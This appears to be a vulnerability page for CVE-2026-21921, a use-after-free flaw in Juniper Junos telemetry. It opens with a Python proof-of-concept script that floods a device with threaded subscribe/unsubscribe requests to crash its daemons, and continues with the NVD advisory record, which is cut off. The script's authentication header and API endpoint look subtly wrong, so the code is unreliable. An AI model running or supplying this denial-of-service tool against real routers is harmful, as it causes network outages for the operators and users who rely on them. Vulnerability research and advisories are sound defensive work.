CVE-2026-21921

#!/usr/bin/env python3 """ CVE-2026-21921 PoC - Juniper Junos OS Telemetry DoS Note: This PoC is for educational and authorized testing purposes only. """ import requests import concurrent.futures import time import argparse def subscribe_sensor(target_ip, sensor_path, username, password): """Subscribe to telemetry sensor""" url = f"https://{target_ip}/api/ telemetry/subscribe" headers = { "Content-Type": "application/json", "Authorization": f"Basic {username}:{password}" } payload = { "path": sensor_path, "format": "json" } try: response = requests.post(url, json=payload, headers=headers, verify=False, timeout=5) return response.status_code == 200 except: return False def unsubscribe_sensor(target_ip, sensor_path, username, password): """Unsubscribe from telemetry sensor""" url = f"https://{target_ip}/api/ telemetry/unsubscribe" headers = { "Content-Type": "application/json", "Authorization": f"Basic {username}:{password}" } payload = { "path": sensor_path } try: response = requests.post(url, json=payload, headers=headers, verify=False, timeout=5) return response.status_code == 200 except: return False def attack_worker(target_ip, sensor_path, username, password, iterations): """Worker function to perform subscribe/unsubscribe cycle""" for _ in range(iterations): subscribe_sensor(target_ip, sensor_path, username, password) unsubscribe_sensor(target_ip, sensor_path, username, password) time.sleep(0.01) def main(): parser = argparse.ArgumentParser(description='CVE-2026-21921 PoC') parser.add_argument('--target', required=True, help='Target Junos device IP') parser.add_argument('--username', required=True, help='Low-privilege username') parser.add_argument('--password', required=True, help='Password') parser.add_argument('--threads', type=int, default=10, help='Number of threads') parser.add_argument('--iterations', type=int, default=100, help='Iterations per thread') args = parser.parse_args() sensor_paths = [ "/junos/system/line-card/environment/", "/junos/system/line-card/interface/", "/junos/system/line-card/optics/" ] print(f'[*] Starting CVE-2026-21921 attack on {args.target}') print(f'[*] Using {args.threads} threads with {args.iterations} iterations each') with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor: futures = [] for sensor in sensor_paths: future = executor.submit(attack_worker, args.target, sensor, args.username, args.password, args.iterations) futures.append(future) concurrent.futures.wait(futures) print('[+] Attack completed') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-21921", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:08.400", "lastModified": "2026-01-23T18:52:35.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Use After Free vulnerability in the chassis daemon (chassisd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker authenticated with low privileges to cause a Denial-of-Service (DoS).\n\nWhen telemetry collectors are frequently subscribing and unsubscribing to sensors continuously over a long period of time, telemetry-capable processes like chassisd, rpd or mib2d will crash and restart, which - depending on the process - can cause a complete outage until the system has recovered.\n\nThis issue affects:\n\n Junos OS: \n\n\n\n * all versions before 22.4R3-S8,\n * 23.2 versions before 23.2R2-S5,\n * 23.4 versions before 23.4R2;\n\n\n\n\nJunos OS Evolved:\n\n\n\n * all versions before 22.4R3-S8-EVO,\n * 23.2 versions before 23.2R2-S5-EVO,\n * 23.4 versions before 23.4R2-EVO."}, {"lang": "es", "value": "Una vulnerabilidad de Uso Después de Liberar en el demonio de chasis (chassisd) de Juniper Networks Junos OS y Junos OS Evolved permite a un atacante basado en red autenticado con bajos privilegios causar una Denegación de Servicio (DoS).\n\nCuando los recolectores de telemetría se suscriben y anulan la suscripción a sensores frecuentemente y de forma continua durante un largo período de tiempo, los procesos con capacidad de telemetría como chassisd, rpd o mib2d se bloquearán y reiniciarán, lo cual - dependiendo del proceso - puede causar una interrupción completa hasta que el sistema se haya recuperado.\n\nEste problema afecta:\n\nJunos OS:\n\n * todas las versiones anteriores a 22.4R3-S8,\n * versiones 23.2 anteriores a 23.2R2-S5,\n * versiones 23.4 anteriores a 23.4R2;\n\nJunos OS Evolved:\n\n * todas las versiones anteriores a 22.4R3-S8-EVO,\n * versiones 23.2 anteriores a 23.2R2-S5-EVO,\n * versiones 23.4 anteriores a 23.4R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "3A064B6B-A99B-4D8D-A62D-B00C7870B ... (truncated)